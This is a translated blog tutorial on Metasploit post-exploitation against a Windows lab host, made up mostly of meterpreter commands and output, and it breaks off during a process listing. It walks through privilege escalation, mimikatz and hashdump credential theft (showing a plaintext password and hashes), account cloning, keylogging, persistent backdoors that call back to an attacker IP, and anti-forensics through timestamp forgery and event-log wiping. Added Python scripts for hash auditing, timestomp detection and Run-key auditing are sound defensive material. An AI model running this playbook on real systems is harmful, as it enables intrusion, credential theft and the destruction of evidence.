The role of Metasploit in post-exploitation

Original post, 2018-10-10 15:38:20

This article was originally written by 脉搏 author daiker; follow along with daiker to expand your own toolkit.

0x00 Preface

Here we take a brief look at using meterpreter. One very useful property of meterpreter is that, apart from persistence, all of its operations run in memory and nothing is written to the physical disk; after a reboot, all traces are gone.

0x01 Privilege escalation

getsystem

    meterpreter > getuid
    Server username: TEST\Administrator
    meterpreter > getsystem
    ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM

bypassuac

    meterpreter > background
    [*] Backgrounding session 1...
    msf exploit(multi/handler) > use exploit/windows/local/bypassuac
    msf exploit(windows/local/bypassuac) > set session 1
    session => 1
    msf exploit(windows/local/bypassuac) > exploit
    [*] Started reverse TCP handler on 192.168.161.138:4444

Escalating via a Windows local privilege-escalation vulnerability

    meterpreter > background
    [*] Backgrounding session 1...
    msf exploit(windows/local/bypassuac_vbs) > use post/windows/gather/enum_patches
    msf post(windows/gather/enum_patches) > set session 1
    session => 1
    msf post(windows/gather/enum_patches) > exploit

    [+] KB2871997 is missing
    [+] KB2928120 is missing
    [+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
    [+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
    [+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
    [*] KB2778930 applied
    [+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
    [+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
    [*] Post module execution completed
    msf post(windows/gather/enum_patches) > search MS13-053

    Matching Modules
    ================

       Name                                        Disclosure Date  Rank     Description
       ----                                        ---------------  ----     -----------
       exploit/windows/local/ms13_053_schlamperei  2013-12-01       average  Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
       exploit/windows/local/ppr_flatten_rec       2013-05-15       average  Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation

    msf post(windows/gather/enum_patches) > use exploit/windows/local/ms13_053_schlamperei
    msf exploit(windows/local/ms13_053_schlamperei) > show options

    Module options (exploit/windows/local/ms13_053_schlamperei):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION                   yes       The session to run this module on.

    Exploit target:

       Id  Name
       --  ----
       0   Windows 7 SP0/SP1

    msf exploit(windows/local/ms13_053_schlamperei) > set session 1
    session => 1
    msf exploit(windows/local/ms13_053_schlamperei) > exploit

    [*] Started reverse TCP handler on 192.168.161.138:4444
    [*] Launching notepad to host the exploit...
    [+] Process 2980 launched.
    [*] Reflectively injecting the exploit DLL into 2980...
    [*] Injecting exploit into 2980...
    [*] Found winlogon.exe with PID 432
    [+] Everything seems to have worked, cross your fingers and wait for a SYSTEM shell
    [*] Sending stage (179779 bytes) to 192.168.161.132
    [*] Meterpreter session 2 opened (192.168.161.138:4444 -> 192.168.161.132:49959) at 2018-03-19 16:56:51 +0800

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM

0x02 Domain administrator sniffing

    msf exploit(multi/handler) > use post/windows/gather/enum_domain
    msf post(windows/gather/enum_domain) > show options

    Module options (post/windows/gather/enum_domain):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION                   yes       The session to run this module on.

    msf post(windows/gather/enum_domain) > set session 1
    session => 1
    msf post(windows/gather/enum_domain) > exploit

    [+] FOUND Domain: test
    [+] FOUND Domain Controller: WIN-JDS94C5QEQQ (IP: 127.0.0.1)
    [*] Post module execution completed

0x03 Grabbing passwords

    meterpreter > load mimikatz
    Loading extension mimikatz...Success.
    meterpreter > help
    ...
    Mimikatz Commands
    =================

        Command           Description
        -------           -----------
        kerberos          Attempt to retrieve kerberos creds
        livessp           Attempt to retrieve livessp creds
        mimikatz_command  Run a custom command
        msv               Attempt to retrieve msv creds (hashes)
        ssp               Attempt to retrieve ssp creds
        tspkg             Attempt to retrieve tspkg creds
        wdigest           Attempt to retrieve wdigest creds

    meterpreter > wdigest
    [!] Not currently running as SYSTEM
    [*] Attempting to getprivs
    [+] Got SeDebugPrivilege
    [*] Retrieving wdigest credentials
    wdigest credentials
    ===================

    AuthID    Package    Domain        User           Password
    ------    -------    ------        ----           --------
    0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
    0;49485   NTLM                                    
    0;293672  Kerberos   TEST          Administrator  TopSec_2017
    0;996     Negotiate  TEST          TOPSEC$        ba 42 06 75 2b cd 83 7d ea f0 9f 4d 2e a2 03 97 eb de 0d 28 4c 5c 43 6b 64 ee bf 4e 23 75 4c 03 46 93 2c 54 70 e2 4f 0f 8b ef 34 6b 9e f2 de 5a 6f 92 7a 6e 10 0d fe 94 fc 3e 89 02 db 2e a9 ab cd 52 1e 7f 98 20 b8 cf 24 f6 1b f9 a1 b8 9c 10 e7 a4 f1 b3 16 18 5b 5a 15 b2 d3 c2 20 98 f6 b9 36 44 6c 78 39 1a ea bc 35 e6 cc cf c8 94 19 87 34 3e ff 05 b6 bb 91 8b 29 e8 55 0c c6 8d 7a 43 ab de 6d 5e a0 b7 4d 00 6a b8 d3 14 d1 53 2f 02 51 53 14 69 59 b4 9a e8 d2 ae ce 26 23 4e f6 de 6f 83 44 07 59 fa a5 82 c9 ac 57 28 88 97 6b 70 07 22 5c de 1f 8e d4 6e 14 85 62 3e 79 f0 9a f8 07 e7 84 53 ed 03 95 09 0b d4 3f 8a b2 78 e5 2e df b9 ed ff ff bd 57 71 19 74 cb d7 b7 66 fe 16 ee da 0f 8b 57 23 81 79 8b 98 62 48 8f 5d 9d 0c 
    0;999     Negotiate  TEST          TOPSEC$        ba 42 06 75 2b cd 83 7d ea f0 9f 4d 2e a2 03 97 eb de 0d 28 4c 5c 43 6b 64 ee bf 4e 23 75 4c 03 46 93 2c 54 70 e2 4f 0f 8b ef 34 6b 9e f2 de 5a 6f 92 7a 6e 10 0d fe 94 fc 3e 89 02 db 2e a9 ab cd 52 1e 7f 98 20 b8 cf 24 f6 1b f9 a1 b8 9c 10 e7 a4 f1 b3 16 18 5b 5a 15 b2 d3 c2 20 98 f6 b9 36 44 6c 78 39 1a ea bc 35 e6 cc cf c8 94 19 87 34 3e ff 05 b6 bb 91 8b 29 e8 55 0c c6 8d 7a 43 ab de 6d 5e a0 b7 4d 00 6a b8 d3 14 d1 53 2f 02 51 53 14 69 59 b4 9a e8 d2 ae ce 26 23 4e f6 de 6f 83 44 07 59 fa a5 82 c9 ac 57 28 88 97 6b 70 07 22 5c de 1f 8e d4 6e 14 85 62 3e 79 f0 9a f8 07 e7 84 53 ed 03 95 09 0b d4 3f 8a b2 78 e5 2e df b9 ed ff ff bd 57 71 19 74 cb d7 b7 66 fe 16 ee da 0f 8b 57 23 81 79 8b 98 62 48 8f 5d 9d 0c

Or:

    msf post(windows/gather/hashdump) > exploit

    [*] Obtaining the boot key...
    [*] Calculating the hboot key using SYSKEY 2739ba60d0407daf0d866cb3ee4b6b9f...
    [*] Obtaining the user list and keys...
    [*] Decrypting user keys...
    [*] Dumping password hints...

    No users with password hints on this system

    [*] Dumping password hashes...

    Administrator:500:aad3b435b51404eeaad3b435b51404ee:f013ff76154a124f8cfc32f654582420:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

    [*] Post module execution completed
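The hashdump output above is in pwdump format (user:RID:LM hash:NT hash:::). Whoever ends up holding such a dump during an incident or an authorised audit wants three answers immediately: which accounts have a blank password, which still store a legacy LM hash, and which accounts share a password. The Python script below is an added example, not part of the original article or of Metasploit. It parses the two lines from the page plus two constructed accounts (svc_backup reusing the Administrator hash, legacy with an LM hash; those hash values are constructed), and the two constants are the well-known LM and NT hashes of the empty string. The cleartext in the wdigest table further up is a separate matter: it is what the missing KB2871997 from section 0x01 addresses, since that update adds the UseLogonCredential setting that stops WDigest from caching plaintext.

```python
"""Audit a pwdump-style hash dump: blank passwords, legacy LM hashes, shared NT hashes."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# LM and NT hashes of the empty string. An LM field equal to EMPTY_LM means "no LM hash
# stored" (the modern default); an NT field equal to EMPTY_NT means the password is blank.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user:RID:LM:NT::: as produced by hashdump and the pwdump family of tools
PWDUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I
)


@dataclass(frozen=True)
class SamEntry:
    user: str
    rid: int
    lm: str
    nt: str


def parse_pwdump(text: str) -> list[SamEntry]:
    """Parse every well-formed pwdump line; malformed lines are skipped, not guessed at."""
    entries = []
    for line in text.splitlines():
        m = PWDUMP_LINE.match(line.strip())
        if m:
            entries.append(SamEntry(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return entries


def audit(entries: list[SamEntry]) -> dict[str, list[str]]:
    """Return findings per account (an empty list means nothing to report)."""
    findings: dict[str, list[str]] = {e.user: [] for e in entries}
    by_nt: dict[str, list[str]] = defaultdict(list)
    for e in entries:
        by_nt[e.nt].append(e.user)
    for e in entries:
        if e.nt == EMPTY_NT:
            findings[e.user].append("blank password")
        if e.lm != EMPTY_LM:
            findings[e.user].append("LM hash stored (legacy, trivially crackable)")
        # Identical NT hashes mean identical passwords: one cracked or relayed hash opens all of them.
        others = sorted(u for u in by_nt[e.nt] if u != e.user)
        if others and e.nt != EMPTY_NT:
            findings[e.user].append("NT hash shared with: " + ", ".join(others))
    return findings


def audit_text(text: str) -> dict[str, list[str]]:
    return audit(parse_pwdump(text))


# Constructed sample: the two lines shown on the page plus two made-up accounts.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f013ff76154a124f8cfc32f654582420:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:f013ff76154a124f8cfc32f654582420:::
legacy:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    for user, notes in audit_text(SAMPLE_DUMP).items():
        print(f"{user:15} {'; '.join(notes) or 'ok'}")
```

Run against the constructed dump, Guest is reported as blank (the NT hash of the empty string, exactly what the page's second line shows), Administrator and svc_backup are reported as sharing a password, and legacy is the only account with an LM hash worth disabling.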

0x04 Token impersonation

Note that spaces and backslashes need to be escaped.

    meterpreter > use incognito
    Loading extension incognito...Success.
    meterpreter > help
    ...
    Incognito Commands
    ==================

        Command              Description
        -------              -----------
        add_group_user       Attempt to add a user to a global group with all tokens
        add_localgroup_user  Attempt to add a user to a local group with all tokens
        add_user             Attempt to add a user with all tokens
        impersonate_token    Impersonate specified token
        list_tokens          List tokens available under current user context
        snarf_hashes         Snarf challenge/response hashes for every token

    meterpreter > list_tokens
    Usage: list_tokens <list_order_option>

    Lists all accessible tokens and their privilege level

    OPTIONS:

        -g        List tokens by unique groupname
        -u        List tokens by unique username

    meterpreter > list_tokens -u

    Delegation Tokens Available
    ========================================
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    TEST\Administrator

    Impersonation Tokens Available
    ========================================
    NT AUTHORITY\ANONYMOUS LOGON

    meterpreter > impersonate_token NT AUTHORITY\\SYSTEM
    [-] User token NT not found
    meterpreter > impersonate_token NT\ AUTHORITY\\SYSTEM
    [+] Delegation token available
    [+] Successfully impersonated user NT AUTHORITY\SYSTEM
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM

0x05 Registry operations

    meterpreter > reg -h
    Usage: reg [command] [options]

    Interact with the target machine's registry.

    OPTIONS:

        -d <opt>  The data to store in the registry value.
        -h        Help menu.
        -k <opt>  The registry key path (E.g. HKLM\Software\Foo).
        -r <opt>  The remote machine name to connect to (with current process credentials
        -t <opt>  The registry value type (E.g. REG_SZ).
        -v <opt>  The registry value name (E.g. Stuff).
        -w        Set KEY_WOW64 flag, valid values [32|64].
    COMMANDS:

        enumkey    Enumerate the supplied registry key [-k <key>]
        createkey    Create the supplied registry key  [-k <key>]
        deletekey    Delete the supplied registry key  [-k <key>]
        queryclass Queries the class of the supplied key [-k <key>]
        setval    Set a registry value [-k <key> -v <val> -d <data>]
        deleteval    Delete the supplied registry value [-k <key> -v <val>]
        queryval    Queries the data contents of a value [-k <key> -v <val>]

The following demonstrates setting an autostart entry through the registry.

    meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
    Enumerating: HKLM\software\microsoft\windows\currentversion\run

      Values (1):

        VMware User Process

    meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v note -d 'C:\Windows\System32\notepad.exe'
    Successfully set note of REG_SZ.
    meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
    Enumerating: HKLM\software\microsoft\windows\currentversion\run

      Values (2):

        VMware User Process
        note

    meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v note
    Key: HKLM\software\microsoft\windows\currentversion\run
    Name: note
    Type: REG_SZ
    Data: C:\Windows\System32\notepad.exe

The following demonstrates cloning a user by copying registry keys.


    meterpreter > reg enumkey -k HKLM\\sam\\sam\\domains\\account\\users
    Enumerating: HKLM\sam\sam\domains\account\users

      Keys (3):

        000001F4
        000001F5
        Names

      Values (1):

    meterpreter > shell
    Process 1884 created.
    Channel 1 created.
    Microsoft Windows [版本 6.1.7601]
    版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

    C:\windows\system32>net user guest /active:yes
    net user guest /active:yes

    C:\windows\system32>reg copy HkLM\sam\sam\domains\account\users00001f4 HkLM\sam\sam\domains\account\users00001f5
    reg copy HkLM\sam\sam\domains\account\users00001f4 HkLM\sam\sam\domains\account\users00001f5
     sam\sam\domains\account\users00001f4\F 已存在，要覆盖吗(Yes/No/All)? Yes
    值 sam\sam\domains\account\users00001f4\V 已存在，要覆盖吗(Yes/No/All)?No
    操作成功完成。

0x06 Port forwarding

    [*] Successfully stopped TCP relay on 0.0.0.0:3389
    meterpreter > portfwd add -l 3389 -p 3389 -r 192.168.161.138
    [*] Local TCP relay created: :3389 <-> 192.168.161.138:3389
    meterpreter > portfwd list

    Active Port Forwards
    ====================

       Index  Local         Remote                Direction
       -----  -----         ------                ---------
       1      0.0.0.0:3389  192.168.161.138:3389  Forward

    1 total active port forwards.

0x07 Searching for files

Very handy in AWD attack-and-defense competitions.

    meterpreter > search -f *flag*
    Found 3 results...
        c:\flag.txt (39 bytes)
        c:\Users\administrator.TEST\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk (477 bytes)
        c:\Users\Administrator.ZGC-20160413JJL\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk (477 bytes)

0x08 Packet capture

    meterpreter > use sniffer
    Loading extension sniffer...Success.
    meterpreter > help

    Sniffer Commands
    ================

        Command             Description
        -------             -----------
        sniffer_dump        Retrieve captured packet data to PCAP file
        sniffer_interfaces  Enumerate all sniffable network interfaces
        sniffer_release     Free captured packets on a specific interface instead of downloading them
        sniffer_start       Start packet capture on a specific interface
        sniffer_stats       View statistics of an active capture
        sniffer_stop        Stop packet capture on a specific interface

    meterpreter > sniffer_interfaces

    1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
    2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )
    3 - 'Intel(R) PRO/1000 MT Network Connection' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )
    4 - 'Intel(R) PRO/1000 MT Network Connection' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )
    5 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

    meterpreter > sniffer_start 5
    [*] Capture started on interface 5 (50000 packet buffer)
    meterpreter > sniffer_dump 5 /tmp/1.pcap
    [*] Flushing packet capture buffer for interface 5...
    [*] Flushed 2540 packets (1450560 bytes)
    [*] Downloaded 036% (524288/1450560)...
    [*] Downloaded 072% (1048576/1450560)...
    [*] Downloaded 100% (1450560/1450560)...
    [*] Download completed, converting to PCAP...
    [*] PCAP file written to /tmp/1.pcap
    meterpreter > sniffer_stop 5
    [*] Capture stopped on interface 5
    [*] There are 29 packets (2263 bytes) remaining
    [*] Download or release them using 'sniffer_dump' or 'sniffer_release'

0x09 Enabling 3389 (RDP)

    meterpreter > run getgui -u haha -p password

    [!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
    [!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
    [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
    [*] Carlos Perez carlos_perez@darkoperator.com
    [*] Setting user account for logon
    [*]     Adding User: haha with Password: password
    [*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20180319.1815.rc
    meterpreter > run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean

This creates a new account; the cleanup resource file removes it again afterward.

0x0A Changing file timestamps

    Usage: timestomp <file(s)> OPTIONS

    OPTIONS:

        -a <opt>  Set the "last accessed" time of the file
        -b        Set the MACE timestamps so that EnCase shows blanks
        -c <opt>  Set the "creation" time of the file
        -e <opt>  Set the "mft entry modified" time of the file
        -f <opt>  Set the MACE of attributes equal to the supplied file
        -h        Help banner
        -m <opt>  Set the "last written" time of the file
        -r        Set the MACE timestamps recursively on a directory
        -v        Display the UTC MACE values of the file
        -z <opt>  Set all four attributes (MACE) of the file

    meterpreter > timestomp -v flag.txt
    [*] Showing MACE attributes for flag.txt
    Modified      : 2017-02-22 14:55:50 +0800
    Accessed      : 2017-01-11 20:53:57 +0800
    Created       : 2017-01-11 20:53:57 +0800
    Entry Modified: 2017-02-22 14:55:50 +0800
    meterpreter > timestomp -v 1.txt
    [*] Showing MACE attributes for 1.txt
    Modified      : 2018-03-19 20:13:36 +0800
    Accessed      : 2018-03-19 21:41:24 +0800
    Created       : 2018-03-19 21:41:24 +0800
    Entry Modified: 2018-03-19 21:41:24 +0800
    meterpreter > timestomp 1.txt -f flag.txt
    [*] Pulling MACE attributes from flag.txt
    [*] Setting specific MACE attributes on 1.txt
    meterpreter > timestomp -v 1.txt
    [*] Showing MACE attributes for 1.txt
    Modified      : 2017-02-22 14:55:50 +0800
    Accessed      : 2017-01-11 20:53:57 +0800
    Created       : 2017-01-11 20:53:57 +0800
    Entry Modified: 2017-02-22 14:55:50 +0800
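What timestomp rewrites are the $STANDARD_INFORMATION timestamps, the set that Explorer, `dir` and `timestomp -v` display. NTFS keeps a second set in the $FILE_NAME attribute that only the kernel writes, when the file is created, renamed or moved, so an examiner compares the two. The Python below is an added example for this section, not code from the article or from Metasploit: it applies the two standard checks to MFT-style records. The records are constructed from the timestamps shown above (flag.txt, and 1.txt after `timestomp 1.txt -f flag.txt`); the sub-second parts and the $FILE_NAME values are assumed, since the transcript shows neither, and evidence.log is a made-up file stomped with second-granularity values.

```python
"""Timestomp indicators: compare $STANDARD_INFORMATION ($SI) against $FILE_NAME ($FN)."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

TZ = timezone(timedelta(hours=8))  # the transcript shows +0800


def ts(text: str, microsecond: int = 0) -> datetime:
    """Parse 'YYYY-MM-DD HH:MM:SS' and attach an assumed sub-second part
    (NTFS stores 100 ns ticks; microseconds are enough to show the idea)."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S").replace(tzinfo=TZ, microsecond=microsecond)


@dataclass(frozen=True)
class MftRecord:
    path: str
    si_created: datetime   # $SI: what timestomp (SetFileTime) rewrites
    si_modified: datetime
    fn_created: datetime   # $FN: copied from $SI by the kernel when the name is written


def timestomp_indicators(rec: MftRecord, slack: timedelta = timedelta(seconds=2)) -> list[str]:
    """Reasons a record looks timestomped; an empty list means nothing stood out.

    1. $FN created is a copy of $SI created taken when the filename was written, so $SI
       created sitting well *before* $FN created means $SI was pushed backwards later.
    2. Tools that accept second-granularity input (timestomp -z/-c/-m/-a/-e) leave a zero
       sub-second part, which ordinary file activity almost never does.
    Limitations: renaming the file *after* stomping re-copies the forged $SI into $FN and
    defeats check 1; check 2 stays silent for `timestomp -f`, which copies full-precision
    values from the donor file, so check 1 is the one that catches the page's example.
    """
    reasons = []
    if rec.si_created < rec.fn_created - slack:
        reasons.append(
            f"$SI created {rec.si_created:%Y-%m-%d %H:%M:%S} precedes "
            f"$FN created {rec.fn_created:%Y-%m-%d %H:%M:%S}"
        )
    if rec.si_created.microsecond == 0 and rec.si_modified.microsecond == 0:
        reasons.append("$SI created/modified carry zero sub-second precision")
    return reasons


def scan(records: list[MftRecord]) -> dict[str, list[str]]:
    return {r.path: timestomp_indicators(r) for r in records}


# Constructed records (see the lead-in). flag.txt: untouched, $SI and $FN agree.
# 1.txt: $SI copied from flag.txt by `timestomp 1.txt -f flag.txt`, while $FN still holds
# the real 2018-03-19 21:41:24 creation time. evidence.log: stomped with whole seconds.
SAMPLE_RECORDS = [
    MftRecord("C:\\flag.txt",
              ts("2017-01-11 20:53:57", 123456), ts("2017-02-22 14:55:50", 654321),
              ts("2017-01-11 20:53:57", 123456)),
    MftRecord("C:\\1.txt",
              ts("2017-01-11 20:53:57", 123456), ts("2017-02-22 14:55:50", 654321),
              ts("2018-03-19 21:41:24", 250000)),
    MftRecord("C:\\evidence.log",
              ts("2016-05-01 00:00:00"), ts("2016-05-01 00:00:00"),
              ts("2016-05-01 00:00:00", 789000)),
]

if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_RECORDS).items():
        print(path, "->", reasons or "clean")
```

On a live system the $FN values come from an MFT parser (for example the output of a forensic MFT dump converted to CSV), not from the normal file APIs, which is exactly why timestomp cannot reach them.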

0x0B Clearing logs

    meterpreter > clearev
    [*] Wiping 1692 records from Application...
    [*] Wiping 6855 records from System...
    [*] Wiping 2664 records from Security...

0x0C Leaving a backdoor

Metsvc (installed as a service)

    meterpreter > run metsvc

    [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
    [!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
    [*] Creating a meterpreter service on port 31337
    [*] Creating a temporary installation directory C:\Users\ADMINI~1.TES\AppData\Local\Temp\ENDPAzIy...
    [*]  >> Uploading metsrv.x86.dll...
    [*]  >> Uploading metsvc-server.exe...
    [*]  >> Uploading metsvc.exe...
    [*] Starting the service...
         * Installing service metsvc
     * Starting service
    Service metsvc successfully installed.

Now we connect to it:

    msf exploit(multi/handler) > set payload windows/metsvc_bind_tcp
    payload => windows/metsvc_bind_tcp
    msf exploit(multi/handler) > set rhost 192.168.161.132
    rhost => 192.168.161.132
    msf exploit(multi/handler) > set lport 31337
    lport => 31337
    msf exploit(multi/handler) > exploit

    [*] Started bind handler
    [*] 192.168.161.132 - Meterpreter session 6 closed.  Reason: Died
    [*] Meterpreter session 6 opened (127.0.0.1 -> 127.0.0.1) at 2018-03-19 21:37:23 +0800

persistence (installed via an autorun entry)

    meterpreter > run persistence -U -i 5 -p 443 -r 192.168.161.138

    [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
    [!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
    [*] Running Persistence Script
    [*] Resource file for cleanup created at /root/.msf4/logs/persistence/TOPSEC_20180319.1312/TOPSEC_20180319.1312.rc
    [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.161.138 LPORT=443
    [*] Persistent agent script is 99606 bytes long
    [+] Persistent Script written to C:\Users\ADMINI~1.TES\AppData\Local\Temp\xdoxmsHr.vbs
    [*] Executing script C:\Users\ADMINI~1.TES\AppData\Local\Temp\xdoxmsHr.vbs
    [+] Agent executed with PID 3528
    [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jQiyGnPRxgnllmr
    [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Then reboot and try it:

    [*] 192.168.161.132 - Meterpreter session 4 closed.  Reason: Died
    msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.161.132
    [*] Meterpreter session 5 opened (192.168.161.138:443 -> 192.168.161.132:49169) at 2018-03-19 21:18:07 +0800

    msf exploit(multi/handler) > sessions -l

    Active sessions
    ===============

      Id  Name  Type                     Information                  Connection
      --  ----  ----                     -----------                  ----------
      5         meterpreter x86/windows  TEST\Administrator @ TOPSEC  192.168.161.138:443 -> 192.168.161.132:49169 (192.168.161.132)

    msf exploit(multi/handler) > sessions -i 5
    [*] Starting interaction with 5...

    meterpreter >

This leaves a backdoor behind and adds it to the startup entries.
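Two of the transcripts above end in the same place on disk. The registry demo in 0x05 adds a `note` value under HKLM\...\Run, and the persistence script just shown registers a random-named value under HKCU\...\Run that points at a .vbs in the user's Temp directory (this is also where the preface's "nothing is written to disk" stops being true: the VBS, the metsvc files and the Run value are all on disk). Auditing Run keys is the defender's counterpart to both, so the Python below is one added example for the two sections; it is not code from the article or from Metasploit. It diffs the current entries against a known-good baseline (the `Values (1)` state from 0x05) and then scores each entry with heuristics for launches from temporary directories, script hosts and script files, and random-looking value names. The entries are constructed from the page; the vmtoolsd command line given for the VMware entry is assumed.

```python
"""Audit Run-key autostart entries: baseline diff plus per-entry heuristics."""
from __future__ import annotations

# Each entry is (hive, value name, value data) read from
# <hive>\Software\Microsoft\Windows\CurrentVersion\Run.
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\appdata\\roaming\\",
                   "\\programdata\\", "\\users\\public\\", "\\downloads\\")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
                "rundll32.exe", "regsvr32.exe")


def image_path(data: str) -> str:
    """First token of the command line: a quoted path, or everything up to the first space."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split(" ", 1)[0]


def looks_random(name: str) -> bool:
    """Crude pronounceability test: product names rarely string five or more consonants
    together, while generated names such as jQiyGnPRxgnllmr do so freely (a weak signal on
    its own; it is meant to be combined with the path checks)."""
    run = longest = 0
    for ch in name.lower():
        run = run + 1 if ch.isalpha() and ch not in "aeiouy" else 0
        longest = max(longest, run)
    return longest >= 5


def audit_entry(entry: tuple[str, str, str]) -> list[str]:
    """Reasons an autostart entry deserves a look; an empty list means none of the heuristics fired."""
    hive, name, data = entry
    path = image_path(data).lower()
    reasons = []
    if any(d in path for d in SUSPICIOUS_DIRS):
        reasons.append("launches from a user-writable or temporary directory")
    if path.endswith(SCRIPT_EXTS) or path.rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
        reasons.append("script or script host as autostart target")
    if looks_random(name):
        reasons.append("random-looking value name")
    return reasons


def audit_run_entries(entries: list[tuple[str, str, str]]) -> dict[tuple[str, str], list[str]]:
    return {(hive, name): audit_entry((hive, name, data)) for hive, name, data in entries}


def diff_against_baseline(baseline: list[tuple[str, str, str]],
                          current: list[tuple[str, str, str]]) -> list[tuple[str, str]]:
    """Entries present now but absent from the baseline (by hive and name), in current order.
    This is what catches the page's `note` value: a legitimate binary in System32 trips no
    heuristic, only the comparison with the last known-good state."""
    known = {(h, n) for h, n, _ in baseline}
    return [(h, n) for h, n, _ in current if (h, n) not in known]


# Constructed from the page: the baseline is the `Values (1)` state; CURRENT adds the `note`
# value from 0x05 and the persistence entry from 0x0C. The vmtoolsd command line is assumed.
BASELINE = [("HKLM", "VMware User Process",
             '"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe" -n vmusr')]
CURRENT = BASELINE + [
    ("HKLM", "note", "C:\\Windows\\System32\\notepad.exe"),
    ("HKCU", "jQiyGnPRxgnllmr", "C:\\Users\\ADMINI~1.TES\\AppData\\Local\\Temp\\xdoxmsHr.vbs"),
]

if __name__ == "__main__":
    print("new since baseline:", diff_against_baseline(BASELINE, CURRENT))
    for key, reasons in audit_run_entries(CURRENT).items():
        print(key, "->", reasons or "no heuristic fired")
```

A fuller audit would walk the same logic over RunOnce, the per-user and per-machine Startup folders, services (the metsvc service from the first half of this section) and scheduled tasks; the structure stays the same, only the source of the entries changes.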

0x0D Keylogging

    meterpreter > keyscan_start
    Starting the keystroke sniffer ...
    meterpreter > keyscan_dump
    Dumping captured keystrokes...
    mima<Shift><Right Shift>:12345679<^S>

    meterpreter > keyscan_stop
    Stopping the keystroke sniffer...

0x0E Process injection

    meterpreter > ps

    Process List
    ============

     PID   PPID  Name               Arch  Session  User                          Path
     ---   ----  ----               ----  -------  ----                          ----
     0     0     [System Process]                                                
     4     0     System             x86   0                                      
     232   4     smss.exe           x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
     320   312   csrss.exe          x86   0        NT AUTHORITY\SYSTEM           C:\windows\system32\csrss.exe
     368   480   msdtc.exe          x86   0        NT AUTHORITY\NETWORK SERVICE  C:\windows\System32\msdtc.exe
     372   312   wininit.exe        x86   0        NT AUTHORITY\SYSTEM           C:\windows\system32\wininit.exe
     384   364   csrss.exe          x86   1        NT AUTHORITY\SYSTEM           C:\windows\system32\csrss.exe
     432   364   winlogon.exe       x86   1        NT AUTHORITY\SYSTEM           C:\windows\system32\winlogon.exe
     480   372   services.exe       x86   0        NT AUTHORITY\SYSTEM           C:\windows\system32\services.exe
